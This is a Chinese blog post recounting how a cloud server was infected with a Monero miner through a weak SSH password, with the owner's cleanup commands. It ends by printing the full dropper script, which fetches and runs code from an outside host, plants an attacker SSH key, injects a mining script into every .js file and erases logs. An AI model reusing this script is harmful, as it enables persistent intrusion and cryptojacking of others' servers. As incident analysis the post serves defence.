最近阿里云服务器给我发报警短信,提示服务器:进程异常行为-可疑Host访问行为,但因为只是一个自己玩玩的服务器,有时一尽快也没当回事,试着访问了服务器还都正常,后来甚至有报警:恶意进程(云查杀)-挖矿程序,这有一天有空就上来看看,一看问题大了,整个服务器的定时任务被改写了,成了乱码,检查一下其它的东西到还正常,不过打开网站发现突然很慢了,不错,是中毒了,门罗币(XMR)挖矿程序。报警截图如下:本文地址:http://www.04007.cn/article/562.html,未经许可,不得转载.
本文地址:http://www.04007.cn/article/562.html,未经许可,不得转载.
登录服务器后,首先我查看了一下服务器各个文件夹近几天改过的文件,一看还有个从没见过的zigw,这肯定是病毒的一分子。先进行删除,没想这些个文件还给加了特殊权限,继续删除。本文地址:http://www.04007.cn/article/562.html,未经许可,不得转载.
[root@04007 etc]# find ./ -mtime -4 ./ ./zigw #病毒程序文件夹 ./gmbpr2 ./selinux/config ./ld.so.cache ./shz.sh #病毒程序脚本 [root@04007 etc]# sudo rm -f zigw rm: cannot remove `zigw': Operation not permitted [root@04007 etc]# lsattr zigw ----i--------e- zigw [root@04007 etc]# sudo chattr -i zigw [root@04007 etc]# lsattr zigw -------------e- zigw [root@04007 etc]# sudo rm -f zigw [root@04007 etc]#...然后把定时任务什么的也恢复了一下,云阿里后控制后台里看,报警里也有提示恶意文件路径:/etc/zigw,恶意文件md5:016c00d3fa0cc49b76597916aa8f14dd,病毒总是会远程下载这个sh文件:http://c.21-2n.com:43768/shz.sh 然后在服务器上干坏事(挖矿吧),这也就是阿里云报警的可疑Host访问行为。如下图:本文地址:http://www.04007.cn/article/562.html,未经许可,不得转载.
本文地址:http://www.04007.cn/article/562.html,未经许可,不得转载.
在检查中除了发现上述修改外,然后找了个遍,除了上述修改外,在/root/.ssh中也发现病毒有写入.ssh/authorized_keys,记录如下:本文地址:http://www.04007.cn/article/562.html,未经许可,不得转载.
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/ZkBe2ijEAMhqLEzPe4vprfiPAyGO8CF8tn9dcPQXh9iv5/vYEbaDxEvixkTVSJpWnY/5ckeyYsXU9zEeVbbWkdRcuAs8bdVU7PxVq11HLMxiqSR3MKIj7yEYjclLHRUz
gX0mF2/xpZEn4GGL+Kn+7GgxvsRtqHLMWoh2Xoz7f8Rb3KduYiJlZeX02a4qFXHMSkSkMnHirHHtavIFjAB0y952+1DzD36a8IJJcjAGutYjnrZdKP8t3hiEw0UBADhiu3+KU641Kw9BfR9Kg7vZgrVRf7lVzOn6O8YbqgunZImJt+uLljgpP0ZHd
1wGz+QSHEd Administrator@Guess_me
这时基本的文件修改是改正过来了,但是服务器发现有些慢,找到了一个很耗CPU的进程zigw,杀掉了,本文地址:http://www.04007.cn/article/562.html,未经许可,不得转载.
# ps -ef | grep zigw root 13944 1 0 Nov06 ? 00:15:45 ./zigw # sudo kill -stop 13944做到这里我就没有再弄别的,把定时文件恢复了一下,服务器安静了两天,但两天发现又出现了相同的报警,后来上服务器再看了一下,服务器负载正常, 文件修改上只是定时任务文件被改写,看了一下账户记录, 发现一些我没什么印象的用户,感觉不像是我加的。就全部进行了删除, 因为后来看到阿里云里有报警:Linux系统登录弱口令检测(高危)弱密码检测-ssh弱密码检测。看来主要问题还是root密码太简单,所以我同时对必须的用户jenkins和root用户进行了密码修改,因为原来的密码相对很简单,这次让密码变得十分复杂。再就是对定时任务文件添加了一些特殊权限。本文地址:http://www.04007.cn/article/562.html,未经许可,不得转载.
exim:x:93:93::/var/spool/exim:/sbin/nologin rsyncuser:x:505:506::/home/rsyncuser:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin #1,删除多余的用户 [root@04007 ~]# userdel exim [root@04007 ~]# userdel rsyncuser [root@04007 ~]# userdel named #2,对必须的用户更改密码,加强密码复杂度 [root@04007 ~]# passwd jenkins Changing password for user jenkins. #最后对定时任务的文件进行权限添加, $ sudo chattr +i /etc/crontab $ sudo chattr +i /var/spool/cron/root [root@04007 cron.d]# chattr +i /var/spool/cron/root [root@04007 cron.d]# sudo lsattr /var/spool/cron/root ----i--------e- /var/spool/cron/root我还在/etc/cron.d/sysstat里和crontab里添加以下任务,以便随时杀死zigw。不过前提是要给var/spool/cron/root添加特殊i权限。
*/1 * * * * ps -ef|grep zigw|grep -v grep|awk '{print $2}'|xargs kill -9 && date >> /tmp/killzigw.log
还有一个风险是我的SELinux是disabled关闭的,我以前因为一些服务器处理把它关闭了。这项我目前没改过来,可能也会有一点风险,暂时就这样吧。关于门罗币(XMR)挖矿程序详情见:https://4hou.win/wordpress/?spm=a2c4e.11153940.blogcont657476.14.53ff2757BWMBre&cat=6270本文地址:http://www.04007.cn/article/562.html,未经许可,不得转载.
SHZ的病毒脚本代码如下:本文地址:http://www.04007.cn/article/562.html,未经许可,不得转载.
#!/bin/sh
setenforce 0 2>dev/null
echo SELINUX=desabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/gmbpr2
rtdir="/etc/gmbpr2"
oddir="/etc/gmbpr"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/url"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/get"
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/curl /usr/bin/url
if [ -f "$oddir" ]
then
pkill zjgw
chattr -i /etc/shz.sh
rm -f /etc/shz.sh
chattr -i /tmp/shz.sh
rm -f /tmp/shz.sh
chattr -i /etc/gmbpr
rm -f /etc/gmbpr
else
echo "ok"
fi
if [ -f "$rtdir" ]
then
echo "goto 1" >> /etc/gmbpr2
chattr -i $cont
if [ -f "$bbdir" ]
then
[[ $cont =~ "shz.sh" ]] || echo "*/12 * * * * curl -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir}
else
[[ $cont =~ "shz.sh" ]] || echo "*/15 * * * * url -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir}
fi
mkdir /root/.ssh
[[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 700 /root/.ssh/
[[ $ssht =~ "xvsRtqHLMWoh" ]] || echo >> /root/.ssh/authorized_keys
[[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 600 /root/.ssh/authorized_keys
[[ $ssht =~ "xvsRtqHLMWoh" ]] || echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/ZkBe2ijEAMhqLEzPe4vprfiPAyGO8CF8tn9dcPQXh9iv5/vYEbaDxEvixkTVSJpWnY/5ckeyYsXU9zEeVbbWkdRcuAs8bdVU7PxVq11HLMxiqSR3MKIj7yEYjclLHRUzgX0mF2/xpZEn4GGL+Kn+7GgxvsRtqHLMWoh2Xoz7f8Rb3KduYiJlZeX02a4qFXHMSkSkMnHirHHtavIFjAB0y952+1DzD36a8IJJcjAGutYjnrZdKP8t3hiEw0UBADhiu3+KU641Kw9BfR9Kg7vZgrVRf7lVzOn6O8YbqgunZImJt+uLljgpP0ZHd1wGz+QSHEd Administrator@Guess_me" >> /root/.ssh/authorized_keys
ps -fe|grep zigw |grep -v grep
if [ $? -ne 0 ]
then
cd /etc
filesize=`ls -l zigw | awk '{ print $5 }'`
file="/etc/zigw"
if [ -f "$file" ]
then
if [ "$filesize" -ne "1467080" ]
then
chattr -i /etc/zigw
rm -f zigw
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigw
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigw
fi
fi
else
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigw
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigw
fi
fi
chmod 777 zigw
sleep 1s
./zigw
else
echo "runing....."
fi
chmod 777 /etc/zigw
chattr +i /etc/zigw
chmod 777 /etc/shz.sh
chattr +i /etc/shz.sh
shdir='/etc/shz.sh'
if [ -f "$shdir" ]
then
echo "exists shell"
else
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh > /etc/shz.sh
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh > /etc/shz.sh
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/shz.sh
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/shz.sh
fi
sh /etc/shz.sh
fi
else
echo "goto 1" > /tmp/gmbpr2
chattr -i $cont
if [ -f "$bbdir" ]
then
[[ $cont =~ "shz.sh" ]] || echo "*/10 * * * * curl -fsSL http://c.21-2n.com:43768:43768/shz.sh | sh" >> ${crondir}
else
[[ $cont =~ "shz.sh" ]] || echo "*/10 * * * * url -fsSL http://c.21-2n.com:43768:43768/shz.sh | sh" >> ${crondir}
fi
ps -fe|grep zigw |grep -v grep
if [ $? -ne 0 ]
then
cd /tmp
filesize=`ls -l zigw | awk '{ print $5 }'`
file="/tmp/zigw"
if [ -f "$file" ]
then
if [ "$filesize" -ne "1467080" ]
then
chattr -i /tmp/zigw
rm -f zigw
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /tmp/zigw
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /tmp/zigw
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/zigw
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/zigw
fi
fi
else
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /tmp/zigw
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /tmp/zigw
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/zigw
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/zigw
fi
fi
chmod 777 zigw
sleep 1s
./zigw
else
echo "runing....."
fi
chmod 777 /tmp/zigw
chattr +i /tmp/zigw
chmod 777 /tmp/shz.sh
chattr +i /tmp/shz.sh
shdir='/tmp/shz.sh'
if [ -f "$shdir" ]
then
echo "exists shell"
else
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh > /tmp/shz.sh
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh > /tmp/shz.sh
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/shz.sh
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/shz.sh
fi
sh /tmp/shz.sh
fi
fi
iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -A OUTPUT -p tcp --dport 14444 -j DROP
iptables-save
service iptables reload
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
netstat -ano|grep :3333|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :4444|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :5555|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :6666|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :7777|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :3347|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :14444|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :14443|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
find / -name '*.js'|xargs grep -L f4ce9|xargs sed -i '$a\document.write\('\'\<script\ src=\"http://t.cn/EvlonFh\"\>\</script\>\<script\>OMINEId\(\"e02cf4ce91284dab9bc3fc4cc2a65e28\",\"-1\"\)\</script\>\'\)\;
history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
echo > /var/spool/mail/root
本文地址:http://www.04007.cn/article/562.html,未经许可,不得转载. 本文地址:http://www.04007.cn/article/562.html 未经许可,不得转载. 手机访问本页请扫描右下方二维码.
|
|
手机扫码直接打开本页面 |
